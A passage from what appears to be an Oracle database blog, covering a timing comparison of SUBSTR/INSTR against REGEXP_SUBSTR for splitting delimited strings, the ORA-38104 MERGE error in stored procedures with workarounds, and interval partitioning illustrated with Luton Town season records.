regexp_substr(episode, '[^|]+',1, 11) as "The Rise of Skywalker"
from star_wars_numbers
/
Irrespective of aesthetic considerations, I should explain the regexp in use here, if only so I can understand it when I read this a few months from now :
[^|] - match any character that isn't a pipe ("|")
+    - match one or more times
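If you want to see the occurrence parameter doing its thing against a simple literal ( purely for illustration ) :

select regexp_substr('Four|Five|Six', '[^|]+', 1, 2) as second_value
from dual;

…which returns Five.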
Next, we need to find out how the regexp function stacks up when it comes to performance, and we’re not going to find that with a mere 11 rows of data…
Performance Test Setup

Let's make some use of all that space in the Galaxy Far, Far Away…
create table galaxy (
id number generated always as identity,
episode varchar2(4000))
/
begin
for i in 1..100000 loop
insert into galaxy(episode)
select episode from star_wars_numbers;
commit;
end loop;
end;
/
exec dbms_stats.gather_table_stats(user, 'galaxy');
All of the following tests were run on Oracle 19c Enterprise Edition running on Oracle Linux.
Everything was run in a SQL*Plus session from the command line on the database server.
The queries were run in SQL*Plus with the following settings :
set lines 130
clear screen
set autotrace trace
set timing on
Each query was executed at least twice consecutively to ensure that results were not skewed by the state of the buffer cache.
It’s also worth noting that, I found no low-level explanation for the performance discrepancies between the two functions when trawling through trace files. Therefore, I’ve concentrated on elapsed time as the main performance metric in these tests.
Test 1 – All Fields extracted in the Select Clause

Let's start with the SUBSTR function ( referred to as "Standard" henceforth) :
select
id,
substr
(
episode, -- input string
1, -- start position
case
when instr(episode, '|') > 0 then instr(episode, '|') -1
else length(episode)
end -- number of characters to extract
) as "A New Hope",
case when instr(episode, '|', 1, 1) > 0 then
substr
(
episode,
instr(episode, '|', 1, 1) + 1, -- start
case
when instr(episode, '|', 1, 2) > 0 then instr(episode, '|', 1,2) -1
else length(episode)
end
-
instr(episode, '|', 1, 1)
)
end as "The Empire Strikes Back",
case when instr(episode, '|', 1, 2) > 0 then
substr( episode, instr(episode, '|', 1, 2) + 1,
case when instr(episode, '|', 1,3) > 0 then instr(episode, '|',1,3) - 1 else length(episode) end
-
instr(episode, '|', 1, 2))
end as "Return of the Jedi",
case when instr(episode, '|', 1, 3) > 0 then
substr( episode, instr(episode, '|', 1, 3) + 1,
case when instr(episode, '|', 1,4) > 0 then instr(episode, '|',1,4) - 1 else length(episode) end
-
instr(episode, '|', 1, 3))
end as "Phantom Menace",
case when instr(episode, '|', 1, 4) > 0 then
substr( episode, instr(episode, '|', 1, 4) + 1,
case when instr(episode, '|', 1,5) > 0 then instr(episode, '|',1,5) - 1 else length(episode) end
-
instr(episode, '|', 1, 4))
end as "Attack of the Clones",
case when instr(episode, '|', 1, 5) > 0 then
substr( episode, instr(episode, '|', 1, 5) + 1,
case when instr(episode, '|', 1,6) > 0 then instr(episode, '|',1,6) - 1 else length(episode) end
-
instr(episode, '|', 1, 5))
end as "Revenge of the Sith",
case when instr(episode, '|', 1, 6) > 0 then
substr( episode, instr(episode, '|', 1, 6) + 1,
case when instr(episode, '|', 1,7) > 0 then instr(episode, '|',1,7) - 1 else length(episode) end
-
instr(episode, '|', 1, 6))
end as "The Force Awakens",
case when instr(episode, '|', 1, 7) > 0 then
substr( episode, instr(episode, '|', 1, 7) + 1,
case when instr(episode, '|', 1,8) > 0 then instr(episode, '|',1,8) - 1 else length(episode) end
-
instr(episode, '|', 1, 7))
end as "Rogue One",
case when instr(episode, '|', 1, 8) > 0 then
substr( episode, instr(episode, '|', 1, 8) + 1,
case when instr(episode, '|', 1,9) > 0 then instr(episode, '|',1,9) - 1 else length(episode) end
-
instr(episode, '|', 1, 8))
end as "Solo",
case when instr(episode, '|', 1, 9) > 0 then
substr( episode, instr(episode, '|', 1, 9) + 1,
case when instr(episode, '|', 1, 10) > 0 then instr(episode, '|',1, 10) - 1 else length(episode) end
-
instr(episode, '|', 1, 9))
end as "The Last Jedi",
case when instr(episode, '|', 1, 10) > 0 then
substr( episode, instr(episode, '|', 1, 10) + 1,
case when instr(episode, '|', 1, 11) > 0 then instr(episode, '|',1, 11) - 1 else length(episode) end
-
instr(episode, '|', 1, 10))
end as "The Rise of Skywalker"
from galaxy
/
Running this query, we get :
1100000 rows selected.

Elapsed: 00:00:20.32

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
35857676 bytes sent via SQL*Net to client
811886 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed
Before we look at the REGEXP_SUBSTR equivalent, it’s probably worth considering the more streamlined in-line function version of this query :
with function extract_episode( i_string in varchar2, i_pos in pls_integer)
return varchar2
is
begin
return
case when instr(i_string, '|', 1, i_pos -1 ) > 0 then
substr( i_string, instr(i_string, '|', 1, i_pos -1) + 1,
case when instr(i_string, '|', 1, i_pos) > 0 then instr(i_string, '|',1, i_pos) - 1 else length(i_string) end
-
instr( i_string, '|', 1, i_pos - 1))
end;
end;
select
id,
substr
(
episode,
1,
case
when instr(episode, '|') > 0 then instr(episode, '|') -1
else length(episode)
end
) as "A New Hope",
extract_episode( episode, 2) as "Empire Strikes Back",
extract_episode( episode, 3) as "Return of the Jedi",
extract_episode( episode, 4) as "The Phantom Menace",
extract_episode( episode, 5) as "Attack of the Clones",
extract_episode( episode, 6) as "Revenge of the Sith",
extract_episode( episode, 7) as "The Force Awakens",
extract_episode( episode, 8) as "Rogue One",
extract_episode( episode, 9) as "Solo",
extract_episode( episode, 10) as "The Last Jedi",
extract_episode( episode, 11) as "The Rise of Skywalker"
from galaxy
/
Whilst it’s a bit more readable, it’s also a lot slower :
1100000 rows selected.

Elapsed: 00:00:41.76

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
35857676 bytes sent via SQL*Net to client
810042 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed
REGEXP_SUBSTR however, takes slow to a new level…
select id,
regexp_substr(episode, '[^|]+') as "A New Hope",
regexp_substr(episode, '[^|]+',1, 2) as "The Empire Strikes Back",
regexp_substr(episode, '[^|]+',1, 3) as "Return of the Jedi",
regexp_substr(episode, '[^|]+',1, 4) as "The Phantom Menace",
regexp_substr(episode, '[^|]+',1, 5) as "Attack of the Clones",
regexp_substr(episode, '[^|]+',1, 6) as "Revenge of the Sith",
regexp_substr(episode, '[^|]+',1, 7) as "The Force Awakens",
regexp_substr(episode, '[^|]+',1, 8) as "Rogue One",
regexp_substr(episode, '[^|]+',1, 9) as "Solo",
regexp_substr(episode, '[^|]+',1, 10) as "The Last Jedi",
regexp_substr(episode, '[^|]+',1, 11) as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected.

Elapsed: 00:01:27.25

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
35857680 bytes sent via SQL*Net to client
809519 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed
Now see what happens when we give REGEXP_SUBSTR a little help from the humble INSTR (the “hybrid” query) :
select id,
regexp_substr(episode, '[^|]+') as "A New Hope",
decode( instr(episode, '|'), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,1) + 1)) as "The Empire Strikes Back",
decode( instr(episode, '|',1, 2), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,2) + 1)) as "Return of the Jedi",
decode( instr(episode, '|',1, 3), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,3) + 1)) as "The Phantom Menace",
decode( instr(episode, '|',1, 4), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,4) + 1)) as "Attack of the Clones",
decode( instr(episode, '|',1, 5), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,5) + 1)) as "Revenge of the Sith",
decode( instr(episode, '|',1, 6), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,6) + 1)) as "The Force Awakens",
decode( instr(episode, '|',1, 7), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,7) + 1)) as "Rogue One",
decode( instr(episode, '|',1, 8), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,8) + 1)) as "Solo",
decode( instr(episode, '|',1, 9), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,9) + 1)) as "The Last Jedi",
decode( instr(episode, '|',1, 10), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,10) + 1)) as "The Rise of Skywalker"
from galaxy
/
Yes, I have cheated a bit on the aesthetics here by using the more compact DECODE instead of CASE.
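For anyone who prefers CASE, the DECODE for the second field is logically equivalent to something like this ( shown for illustration only ) :

case
    when instr(episode, '|', 1, 1) = 0 then null
    else regexp_substr(episode, '[^|]+', instr(episode, '|', 1, 1) + 1)
end as "The Empire Strikes Back"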
However, this does not affect the runtime of the query, which turns out to be considerably faster than the pure REGEXP_SUBSTR equivalent :
1100000 rows selected.

Elapsed: 00:00:30.83

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
35857680 bytes sent via SQL*Net to client
810158 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed

Test 1 Results Summary

Query Method                       Time (secs)
SUBSTR ( Standard)                       20.32
REGEXP_SUBSTR with INSTR (Hybrid)        30.83
SUBSTR with in-line function             41.76
REGEXP_SUBSTR ( Regexp)                  87.25
The performance of the Hybrid approach does raise the question of how the REGEXP_SUBSTR compares when we’re just looking to extract a single field from a string, rather than all of them…
Test 2 – Extract the first field only

In this instance we're just looking for the first field in EPISODES.
In this context, the hybrid approach doesn’t apply because we’re always starting our search at the start of the input string.
Starting, once again with the Standard approach :
select id,
substr
(
episode, 1,
case
when instr(episode, '|', 1,1) > 0 then instr(episode, '|', 1,1) -1
else length(episode)
end
) as "A New Hope"
from galaxy
/
1100000 rows selected.

Elapsed: 00:00:05.33

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
25086067 bytes sent via SQL*Net to client
808790 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed
Now for REGEXP_SUBSTR :
select id,
regexp_substr( episode, '[^|]+') as "A New Hope"
from galaxy
/
1100000 rows selected.

Elapsed: 00:00:06.38

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
25086067 bytes sent via SQL*Net to client
808868 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed
Interestingly, whilst it’s still not as fast, the Regexp runtime is only 20% longer than the Standard.
This contrasts markedly with the 430% longer that the Regexp took for our first test.
Test 2 Results Summary

Query Method    Time (secs)
Standard               5.33
Regexp                 6.38

Does this relative performance hold true for any single field in the input string ?
Test 3 – Extract the last field only

Starting with the Standard query :
select
id,
case when instr(episode, '|', 1, 10) > 0 then
substr( episode, instr(episode, '|', 1, 10) + 1,
case when instr(episode, '|', 1, 11) > 0 then instr(episode, '|',1, 11) - 1 else length(episode) end
-
instr(episode, '|', 1, 10))
end as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected.

Elapsed: 00:00:05.44

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
25686033 bytes sent via SQL*Net to client
808915 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed
Once again, the Regexp Query is much slower…
select
id,
regexp_substr(episode, '[^|]+',1, 11) as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected.

Elapsed: 00:00:16.16

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
25686033 bytes sent via SQL*Net to client
808888 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed
…unless we use the hybrid approach…
select
id,
decode( instr(episode, '|',1, 10), 0, null, regexp_substr(episode, '[^|]+', instr(episode, '|',1,10) + 1)) as "The Rise of Skywalker"
from galaxy
/
1100000 rows selected.

Elapsed: 00:00:05.60

Execution Plan
----------------------------------------------------------
Plan hash value: 3574103611

----------------------------------------------------------------------------
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time |
----------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1100K| 47M| 2089 (1)| 00:00:01 |
| 1 | TABLE ACCESS FULL| GALAXY | 1100K| 47M| 2089 (1)| 00:00:01 |
----------------------------------------------------------------------------

Statistics
----------------------------------------------------------
0 recursive calls
0 db block gets
80459 consistent gets
7616 physical reads
0 redo size
25686033 bytes sent via SQL*Net to client
808736 bytes received via SQL*Net from client
73335 SQL*Net roundtrips to/from client
0 sorts (memory)
0 sorts (disk)
1100000 rows processed

Test 3 Results Summary

Query Method    Time (secs)
Standard               5.44
Hybrid                 5.60
Regexp                16.16

Conclusions
These tests seem to bear out the fact that, in general, SUBSTR offers better performance than REGEXP_SUBSTR.
However, the performance of REGEXP_SUBSTR can be greatly improved if used in conjunction with INSTR.
As always, the decision as to which function to use will depend on the specific circumstances you find yourself in.
Things that make you go VAAARRRGGGHHHH ! – ORA-38104 in a Stored Program Unit
I do have some empathy with Lauren James getting quite cross at work.
OK, it’s not as pressurised as striving to reach a World Cup Quarter Final, but I am known to become somewhat annoyed when Oracle presents me with :
ORA-38104: Columns referenced in the ON Clause cannot be updated
The error itself is reasonable enough. The thing is, though, that the offending merge statement will not trigger a compile-time error if it's in a Stored Program Unit. Oh no.
Instead, Oracle will let you carry on in blissful ignorance and only give you the bad news at runtime…
Let’s say we have a table called TEAM_AVAILABILITY :
create table team_availability
(
squad_number number,
first_name varchar2(250),
last_name varchar2(250),
available_flag varchar2(1)
)
/
insert into team_availability( squad_number, first_name, last_name)
values( 1, 'Mary', 'Earps');
insert into team_availability( squad_number, first_name, last_name)
values( 2, 'Lucy', 'Bronze');
insert into team_availability( squad_number, first_name, last_name)
values( 3, 'Niamh', 'Charles');
insert into team_availability( squad_number, first_name, last_name)
values( 4, 'Keira', 'Walsh');
insert into team_availability( squad_number, first_name, last_name)
values( 5, 'Alex', 'Greenwood');
insert into team_availability( squad_number, first_name, last_name)
values( 6, 'Millie', 'Bright');
insert into team_availability( squad_number, first_name, last_name)
values( 7, 'Lauren', 'James');
insert into team_availability( squad_number, first_name, last_name)
values( 8, 'Georgia', 'Stanway');
insert into team_availability( squad_number, first_name, last_name)
values( 9, 'Rachel', 'Daly');
insert into team_availability( squad_number, first_name, last_name)
values( 10, 'Ella', 'Toone');
insert into team_availability( squad_number, first_name, last_name)
values( 11, 'Lauren', 'Hemp');
insert into team_availability( squad_number, first_name, last_name)
values( 12, 'Jordan', 'Nobbs');
insert into team_availability( squad_number, first_name, last_name)
values( 13, 'Hannah', 'Hampton');
insert into team_availability( squad_number, first_name, last_name)
values( 14, 'Lotte', 'Wubben-Moy');
insert into team_availability( squad_number, first_name, last_name)
values( 15, 'Esme', 'Morgan');
insert into team_availability( squad_number, first_name, last_name)
values( 16, 'Jess', 'Carter');
insert into team_availability( squad_number, first_name, last_name)
values( 17, 'Laura', 'Coombs');
insert into team_availability( squad_number, first_name, last_name)
values( 18, 'Chloe', 'Kelly');
insert into team_availability( squad_number, first_name, last_name)
values( 19, 'Bethany', 'England');
insert into team_availability( squad_number, first_name, last_name)
values( 20, 'Katie', 'Zelem');
insert into team_availability( squad_number, first_name, last_name)
values( 21, 'Ellie', 'Roebuck');
insert into team_availability( squad_number, first_name, last_name)
values( 22, 'Katie', 'Robinson');
insert into team_availability( squad_number, first_name, last_name)
values( 23, 'Alessia', 'Russo');
commit;
We have a procedure that we can use to mark a player as being unavailable for selection :
create or replace procedure mark_player_unavailable( i_squad_number team_availability.squad_number%type)
is
begin
merge into team_availability
using dual
on
(
squad_number = i_squad_number
and available_flag is null
)
when matched then update
set available_flag = 'N';
end mark_player_unavailable;
/
When we create the procedure, everything seems fine…
Procedure MARK_PLAYER_UNAVAILABLE compiled
However, running it causes Oracle to do the equivalent of a VAR check, which results in :
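For example, calling the procedure for any player ( squad number 7 here, chosen purely for illustration ) fails at runtime with :

exec mark_player_unavailable(7)

ORA-38104: Columns referenced in the ON Clause cannot be updated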
As to why Oracle does this, other than to annoy me, I have no idea.
Then again, I’m not sure why I keep falling into this trap either.
To avoid this altogether, there are a couple of options…
Workarounds

We could simply use an update instead of a merge :
create or replace procedure mark_player_unavailable( i_squad_number team_availability.squad_number%type)
is
begin
update team_availability
set available_flag = 'N'
where squad_number = i_squad_number
and available_flag is null;
end mark_player_unavailable;
/
However, if we still want to use a merge, then we need to use an inline view in the USING clause :
create or replace procedure mark_player_unavailable( i_squad_number team_availability.squad_number%type)
is
begin
merge into team_availability ta
using
(
select tau.squad_number
from team_availability tau
where tau.squad_number = i_squad_number
and tau.available_flag is null
) ilv
on
(
ta.squad_number = ilv.squad_number
)
when matched then update
set ta.available_flag = 'N';
end mark_player_unavailable;
/
…which has the same result.
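As a quick sanity check ( assuming we've called mark_player_unavailable(7) using one of the rewritten versions ), we can confirm the flag has been set :

select first_name, last_name, available_flag
from team_availability
where squad_number = 7;

…which we'd expect to return Lauren James with an AVAILABLE_FLAG of 'N'.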
With my equanimity restored, I can now reflect that yes, Women's football is different from the Men's. In the Women's game, England DO win penalty shoot-outs !
Happy Hatters and Oracle Interval Partitioning
I wouldn’t say that Simon is obsessed about Luton Town FC, but he has been known to express his affection through the medium of creosote :
Needless to say, he’s quite looking forward to next season as the Hatters have completed their Lazarus-like resurrection from the depths of the Conference to the pinnacle of English football – the Premier League.
Over the years, I've occasionally accompanied Simon to Kenilworth Road to watch Luton battle their way through the divisions, so it's only fitting that I should pay tribute to their achievement in the examples that follow.
The technical subject at hand here is the advantages available when using Interval Partitioning syntax to Range Partition a table by a date.
As we're talking about partitioning, here's the standard warning about licensing…
Partitioning is usually an additional cost option on the Enterprise Edition license. It’s a really good idea to make sure that whatever platform you’re on is appropriately licensed before you use this feature.
For this post, I’ll be using 23c Free, which does include Partitioning.
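If you want to double-check on your own environment, one option ( assuming you have access to V$OPTION ) is :

select value
from v$option
where parameter = 'Partitioning';

…which should return TRUE if the Partitioning option is available.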
We’ll start by creating a conventional Range Partitioned table and see what happens when we try to create data in a non-existent partition.
We’ll then try the same thing, but this time using an Interval Partitioned Table.
Finally, we’ll take a look at the SQL functions available to define intervals when creating Interval Partitions.
Partitioning by Date using conventional Range Partitioning

For the purposes of this example, I'm going to create a table which holds details of Luton's final record for a League Season. I'm going to arbitrarily "end" each season on 30th June each year.
I'm going to separate each year into its own partition.
Whilst this may not be a realistic use of partitioning – you’re unlikely to create a table to hold a single row per partition – it does simplify the examples that follow :
create table luton_seasons
(
season_end_date date,
competition varchar2(25),
games_played number,
games_won number,
games_drawn number,
games_lost number,
goals_for number,
goals_against number,
points number,
finishing_position number,
notes varchar2(4000)
)
partition by range( season_end_date)
(
partition season_2013_14 values less than (to_date ('01-JUL-2014', 'DD-MON-YYYY')),
partition season_2014_15 values less than (to_date ('01-JUL-2015', 'DD-MON-YYYY')),
partition season_2015_16 values less than (to_date ('01-JUL-2016', 'DD-MON-YYYY')),
partition season_2016_17 values less than (to_date ('01-JUL-2017', 'DD-MON-YYYY')),
partition season_2017_18 values less than (to_date ('01-JUL-2018', 'DD-MON-YYYY'))
)
/
Populating the table works as you’d expect…
-- 2013-14
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2014', 'DD-MON-YYYY'),
'Conference',
46, 30, 11, 5, 102, 35, 101,
1, 'Promoted back to the Football League !'
);
-- 2014-15
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2015', 'DD-MON-YYYY'),
'League 2',
46, 19, 11, 16, 54, 44, 68,
8, null
);
-- 2015-16
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2016', 'DD-MON-YYYY'),
'League 2',
46, 19, 9, 18, 63, 61, 66,
11, null
);
-- 2016-17
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2017', 'DD-MON-YYYY'),
'League 2',
46, 20, 17, 9, 70, 43, 77,
4, 'Lost in Promotion Play-Off Semi-Final'
);
-- 2017-18
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2018', 'DD-MON-YYYY'),
'League 2',
46, 25, 13, 8, 94, 46, 88,
2, 'Promoted'
);
commit;
select season_end_date, competition, finishing_position, notes
from luton_seasons
order by season_end_date
/
SEASON_END_DATE COMPETITION FINISHING_POSITION NOTES
--------------- ----------- -------------------- ----------------------------------------
01-JUN-2014 Conference 1 Promoted back to the Football League !
01-JUN-2015 League 2 8
01-JUN-2016 League 2 11
01-JUN-2017 League 2 4 Lost in Promotion Play-Off Semi-Final
01-JUN-2018 League 2 2 Promoted
5 rows selected.
…until we try to insert a record for which a partition does not exist…
-- 2018-19
insert into luton_seasons
(
season_end_date,
competition,
games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points,
finishing_position, notes
)
values
(
to_date('01-JUN-2019', 'DD-MON-YYYY'),
'League 1',
46, 27, 13, 6, 90, 42, 94,
1, 'Champions ! Promoted to The Championship'
);
…when we are met with :
ORA-14400: no partition found in table MIKE.LUTON_SEASONS for inserted partition key "2019-06-01T00:00:00"
Wouldn’t it be good if we could just get Oracle to create partitions automatically, as and when they were needed ? Well, we can…
Creating an Interval Partitioned Table

We're going to re-create the table, but this time, we're going to use Interval Partitioning :
drop table luton_seasons;
create table luton_seasons
(
season_end_date date,
competition varchar2(25),
games_played number,
games_won number,
games_drawn number,
games_lost number,
goals_for number,
goals_against number,
points number,
finishing_position number,
notes varchar2(4000)
)
partition by range( season_end_date)
interval (numtoyminterval(1, 'year'))
(
partition season_2013_14 values less than (to_date('01-JUL-2014', 'DD-MON-YYYY'))
)
/
We’re still partitioning by range. However, we’re now specifying an interval, in this case 1 year.
For now though, our chances of avoiding ORA-14400 don’t look good as we’ve only created one partition :
select partition_name, high_value
from user_tab_partitions
where table_name = 'LUTON_SEASONS'
order by 1;
PARTITION_NAME HIGH_VALUE
-------------------- ------------------------------------------------------------------------------------------
SEASON_2013_14 TO_DATE(' 2014-07-01 00:00:00', 'SYYYY-MM-DD HH24:MI:SS', 'NLS_CALENDAR=GREGORIAN')
Side Note – In 23c Oracle have added HIGH_VALUE_CLOB and HIGH_VALUE_JSON to USER_TAB_PARTITIONS so you can access the partition HIGH_VALUE via a datatype that is more malleable than the LONG HIGH_VALUE column that’s been in this view since David Pleat was last Luton manager.
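For example, on 23c, something like this avoids having to deal with a LONG at all :

select partition_name, high_value_clob
from user_tab_partitions
where table_name = 'LUTON_SEASONS'
order by partition_position;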
Anyhow, let’s give it a go :
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2014', 'DD-MON-YYYY'), 'Conference', 46, 30, 11, 5, 102, 35, 101, 1, 'Promoted back to the Football League !' );

-- 2014-15
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2015', 'DD-MON-YYYY'), 'League 2', 46, 19, 11, 16, 54, 44, 68, 8, null );

-- 2015-16
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2016', 'DD-MON-YYYY'), 'League 2', 46, 19, 9, 18, 63, 61, 66, 11, null );

-- 2016-17
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2017', 'DD-MON-YYYY'), 'League 2', 46, 20, 17, 9, 70, 43, 77, 4, 'Lost in Promotion Play-Off Semi-Final' );

-- 2017-18
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2018', 'DD-MON-YYYY'), 'League 2', 46, 25, 13, 8, 94, 46, 88, 2, 'Promoted' );

-- 2018-19
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2019', 'DD-MON-YYYY'), 'League 1', 46, 27, 13, 6, 90, 42, 94, 1, 'Champions ! Promoted to The Championship' );

-- 2019-20
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2020', 'DD-MON-YYYY'), 'Championship', 46, 14, 9, 23, 54, 82, 51, 19, null );

-- 2020-21
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2021', 'DD-MON-YYYY'), 'Championship', 46, 17, 11, 18, 41, 52, 62, 12, null );

-- 2021-22
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2022', 'DD-MON-YYYY'), 'Championship', 46, 21, 12, 13, 63, 55, 75, 6, 'Lost in Promotion Play-Off Semi-Final' );

-- 2022-23
insert into luton_seasons ( season_end_date, competition, games_played, games_won, games_drawn, games_lost, goals_for, goals_against, points, finishing_position, notes )
values ( to_date('01-JUN-2023', 'DD-MON-YYYY'), 'Championship', 46, 21, 17, 8, 57, 39, 80, 3, 'Won Play-Off Final and promoted to Premiership !' );

commit;
Oh look, that all worked :
…and the new partitions have been created automatically…
exec dbms_stats.gather_table_stats(user, 'LUTON_SEASONS');
select partition_name, high_value, num_rows
from user_tab_partitions t
where table_name = 'LUTON_SEASONS'
order by partition_position
/
We can further confirm that a particular partition holds just one record. For example :
select season_end_date, competition, finishing_position
from luton_seasons partition (SYS_P996);
…or, as we’re partitioning by date…
select season_end_date, competition, finishing_position
from luton_seasons partition for (to_date ('31-MAY-2019', 'DD-MON-YYYY'));
…confirms a single row in the partition…
